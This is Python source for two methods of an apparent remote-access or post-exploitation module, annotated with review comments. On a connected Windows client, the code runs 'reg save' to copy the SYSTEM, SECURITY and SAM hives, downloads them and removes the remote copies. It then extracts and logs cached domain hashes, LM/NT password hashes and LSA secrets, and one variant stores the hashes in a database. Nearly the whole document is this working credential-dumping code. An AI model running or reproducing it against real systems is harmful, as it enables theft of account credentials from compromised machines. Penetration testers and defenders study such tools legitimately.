def run(self, args):
    """Collect the SYSTEM, SECURITY and SAM hives from the connected client
    and print the credential material they contain.

    Sequence (the order matters, every step feeds the next):
      1. ``reg save`` each hive to the client's %TEMP%,
      2. transfer the three files into a local per-client directory,
      3. delete the remote copies (best effort),
      4. parse the local copies with the creddump helpers and log the
         cached domain hashes, the LM/NT hashes and the LSA secrets.

    Args:
        args: not used by this method.

    Returns:
        None. Returns early, after ``self.error``, when
        ``get_file_secrets`` yields nothing.

    Side effects worth knowing for handling and review:
      * three ``reg save`` processes run on the client and three hive
        files are created (then removed) under its %TEMP%;
      * the downloaded hives stay on disk under ``rep`` after the method
        returns — nothing here deletes them, and they contain the same
        secrets as the logged output, so they need the same protection.
    """
    # First, we download the hives...
    # Local destination: data/downloads/<client short name>/hives, relative
    # to the current working directory. NOTE(review): short_name() is used
    # as a path component; presumably it is already sanitised — verify.
    rep=os.path.join("data","downloads",self.client.short_name(),"hives")
    try:
        os.makedirs(rep)
    except Exception:
        # NOTE(review): meant to tolerate an already-existing directory, but
        # it also hides permission or disk errors; the download below is
        # then the first place the failure shows up.
        pass
    self.info("saving SYSTEM hives in %TEMP%...")
    # %TEMP% is expanded by the remote shell. '/y' forces overwrite of an
    # existing file (unconditional here; compare the version-gated variant
    # in windows()). Saving these hives normally needs elevated rights on
    # the client — that is not checked, and the exit status of reg save is
    # not inspected either: a failure is only visible in the logged output.
    for cmd in ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM /y", "reg save HKLM\\SECURITY %TEMP%/SECURITY /y", "reg save HKLM\\SAM %TEMP%/SAM /y"):
        self.info("running %s..." % cmd)
        self.log(shell_exec(self.client, cmd))
    self.success("hives saved!")
    # Expand %TEMP% on the client side (conn.modules looks like a remote
    # module proxy, RPyC-style — confirm) so the paths match what reg.exe
    # wrote to.
    remote_temp=self.client.conn.modules['os.path'].expandvars("%TEMP%")
    self.info("downloading SYSTEM hive...")
    download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(rep, "SYSTEM"))
    self.info("downloading SECURITY hive...")
    download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(rep, "SECURITY"))
    self.info("downloading SAM hive...")
    download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(rep, "SAM"))
    self.success("hives downloaded to %s" % rep)
    # Cleanup
    # Remove the remote copies. Best effort: a failure is only logged as a
    # warning, so a hive copy may be left behind in the client's %TEMP%.
    self.info("cleaning up saves...")
    try:
        self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SYSTEM"))
        self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SECURITY"))
        self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
        self.success("saves deleted")
    except Exception as e:
        self.warning("error deleting temporary files: %s"%str(e))
    # Time to run creddump!
    # HiveFileAddressSpace - Volatility's file-backed hive address space,
    # opened over the local copies.
    sysaddr = HiveFileAddressSpace(os.path.join(rep, "SYSTEM"))
    secaddr = HiveFileAddressSpace(os.path.join(rep, "SECURITY"))
    samaddr = HiveFileAddressSpace(os.path.join(rep, "SAM"))
    #detect windows version
    # getwindowsversion()[0] is the major version; 6 and above is
    # Vista/Server 2008 or newer. The flag is only consumed by the
    # creddump parsers below (the reg save commands above do not use it).
    is_vista=False
    try:
        if self.client.conn.modules['sys'].getwindowsversion()[0] >=6:
            is_vista=True
            self.info("windows > vista detected")
        else:
            self.info("windows < vista detected")
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
        # 'except Exception' would be the intended scope.
        self.warning("windows version couldn't be determined. supposing vista=False")
    # Print the results
    # Cached domain (MSCACHE) entries. Tuple fields presumably are user,
    # domain, domain name and hash — confirm against dump_hashes.
    # str.encode('hex') is Python 2 only.
    self.info("dumping cached domain passwords...")
    for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
        self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'), d.lower(), dn.lower()))
    self.info("dumping LM and NT hashes...")
    # bootkey comes from SYSTEM, hbootkey from SAM + bootkey; both are needed
    # to decrypt the per-user entries.
    bootkey = get_bootkey(sysaddr)
    hbootkey = get_hbootkey(samaddr,bootkey)
    for user in get_user_keys(samaddr):
        lmhash, nthash = get_user_hashes(user,hbootkey)
        # empty_lm / empty_nt are module-level constants used when the
        # account has no hash of that type (contents not visible here).
        if not lmhash:
            lmhash = empty_lm
        if not nthash:
            nthash = empty_nt
        # pwdump-style line: name:rid:lm:nt:::. The SAM key name is parsed
        # as hex — presumably the RID; confirm.
        self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')))
    self.info("dumping lsa secrets...")
    secrets = get_file_secrets(os.path.join(rep, "SYSTEM"), os.path.join(rep, "SECURITY"), is_vista)
    if not secrets:
        self.error("unable to read LSA secrets, perhaps the hives are corrupted")
        return
    # secrets is iterated like a mapping: key name, then a 16-byte-wide
    # dump of the value via self.dump (helper defined elsewhere).
    for key in secrets:
        self.log(key)
        self.log(self.dump(secrets[key], length=16))
    # The End! (hurrah)
    self.success("dump was successfull!")
def windows(self):
    """Windows variant of the hive collection: save, download, parse, and
    additionally record the recovered hashes in ``self.db``.

    Differences from ``run``: the Windows version is detected first and
    ``/y`` is appended to ``reg save`` only on Vista+; the local directory
    is ``self.rep`` (expected to be set before this is called — not
    created here); every hash is also collected into a list of records
    and stored with ``self.db.add``.

    Returns:
        None. Returns early, after ``self.error``, when
        ``get_file_secrets`` yields nothing.

    Side effects: ``reg save`` processes and temporary hive files on the
    client (removed best effort), hive copies left under ``self.rep``,
    and hash records written to the database — the database and the local
    hive files both hold the secrets printed here.
    """
    # First, we download the hives...
    #detect windows version
    # getwindowsversion()[0] is the major version; 6+ is Vista/Server 2008
    # or newer. Detected up front because it gates the '/y' flag below as
    # well as the creddump parsers.
    is_vista = False
    try:
        if self.client.conn.modules['sys'].getwindowsversion()[0] >= 6:
            is_vista = True
            self.info("windows > vista detected")
        else:
            self.info("windows < vista detected")
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit;
        # 'except Exception' would be the intended scope.
        self.warning(
            "windows version couldn't be determined. supposing vista=False"
        )
    self.success("saving SYSTEM hives in %TEMP%...")
    # %TEMP% is expanded by the remote shell. '/y' (force overwrite) is only
    # added on Vista+, presumably because older reg.exe rejects it — confirm.
    # When is_vista is set, cmds becomes a one-shot generator; it is consumed
    # exactly once by the loop below.
    cmds = ("reg save HKLM\\SYSTEM %TEMP%/SYSTEM",
            "reg save HKLM\\SECURITY %TEMP%/SECURITY",
            "reg save HKLM\\SAM %TEMP%/SAM")
    if is_vista:
        cmds = (x + ' /y' for x in cmds)
    # Exit status of reg save is not inspected; a failure (e.g. missing
    # elevated rights on the client) only shows in the logged output.
    for cmd in cmds:
        self.info("running %s..." % cmd)
        self.log(shell_exec(self.client, cmd))
    self.success("hives saved!")
    # Expand %TEMP% on the client side (conn.modules looks like a remote
    # module proxy, RPyC-style — confirm) so the paths match reg.exe's.
    remote_temp = self.client.conn.modules['os.path'].expandvars("%TEMP%")
    self.info("downloading SYSTEM hive...")
    download(self.client.conn, ntpath.join(remote_temp, "SYSTEM"), os.path.join(self.rep, "SYSTEM"))
    self.info("downloading SECURITY hive...")
    download(self.client.conn, ntpath.join(remote_temp, "SECURITY"), os.path.join(self.rep, "SECURITY"))
    self.info("downloading SAM hive...")
    download(self.client.conn, ntpath.join(remote_temp, "SAM"), os.path.join(self.rep, "SAM"))
    self.success("hives downloaded to %s" % self.rep)
    # Cleanup
    # Remove the remote copies. Best effort: a failure is only logged as a
    # warning, so a hive copy may be left behind in the client's %TEMP%.
    self.success("cleaning up saves...")
    try:
        self.client.conn.modules.os.remove(
            ntpath.join(remote_temp, "SYSTEM"))
        self.client.conn.modules.os.remove(
            ntpath.join(remote_temp, "SECURITY"))
        self.client.conn.modules.os.remove(ntpath.join(remote_temp, "SAM"))
        self.success("saves deleted")
    except Exception as e:
        self.warning("error deleting temporary files: %s" % str(e))
    # Time to run creddump!
    # Records accumulated here and handed to self.db.add in one call.
    hashes = []
    # HiveFileAddressSpace - Volatility's file-backed hive address space,
    # opened over the local copies.
    sysaddr = HiveFileAddressSpace(os.path.join(self.rep, "SYSTEM"))
    secaddr = HiveFileAddressSpace(os.path.join(self.rep, "SECURITY"))
    samaddr = HiveFileAddressSpace(os.path.join(self.rep, "SAM"))
    # Print the results
    # Cached domain (MSCACHE) entries. Tuple fields presumably are user,
    # domain, domain name and hash — confirm against dump_hashes.
    # str.encode('hex') is Python 2 only.
    self.success("dumping cached domain passwords...")
    for (u, d, dn, h) in dump_hashes(sysaddr, secaddr, is_vista):
        self.log("%s:%s:%s:%s" % (u.lower(), h.encode('hex'), d.lower(), dn.lower()))
        hashes.append({
            'Login': u.lower(),
            'Hash': "%s:%s:%s" % (h.encode('hex'), d.lower(), dn.lower()),
            'Category': 'MSCACHE hash',
            'CredType': 'hash'
        })
    self.success("dumping LM and NT hashes...")
    # bootkey comes from SYSTEM, hbootkey from SAM + bootkey; both are needed
    # to decrypt the per-user entries.
    bootkey = get_bootkey(sysaddr)
    hbootkey = get_hbootkey(samaddr, bootkey)
    for user in get_user_keys(samaddr):
        lmhash, nthash = get_user_hashes(user, hbootkey)
        # empty_lm / empty_nt are module-level constants used when the
        # account has no hash of that type (contents not visible here).
        if not lmhash:
            lmhash = empty_lm
        if not nthash:
            nthash = empty_nt
        # pwdump-style line: name:rid:lm:nt:::. The SAM key name is parsed
        # as hex — presumably the RID; confirm.
        self.log("%s:%d:%s:%s:::" % (get_user_name(user), int(
            user.Name, 16), lmhash.encode('hex'), nthash.encode('hex')))
        hashes.append({
            'Login': get_user_name(user),
            'Hash': "%s:%s" % (lmhash.encode('hex'), nthash.encode('hex')),
            'Category': 'NTLM hash',
            'CredType': 'hash'
        })
    # Single batched write; the list may be empty if no entries were found.
    self.db.add(hashes)
    self.success("Hashes stored on the database")
    self.success("dumping lsa secrets...")
    secrets = get_file_secrets(os.path.join(self.rep, "SYSTEM"), os.path.join(self.rep, "SECURITY"), is_vista)
    if not secrets:
        self.error(
            "unable to read LSA secrets, perhaps the hives are corrupted")
        return
    # secrets is iterated like a mapping: key name, then a 16-byte-wide
    # dump of the value via self.dump (helper defined elsewhere). Unlike the
    # hashes above, LSA secrets are only logged, not stored in self.db.
    for key in secrets:
        self.log(key)
        self.log(self.dump(secrets[key], length=16))
    # The End! (hurrah)
    self.success("dump was successfull!")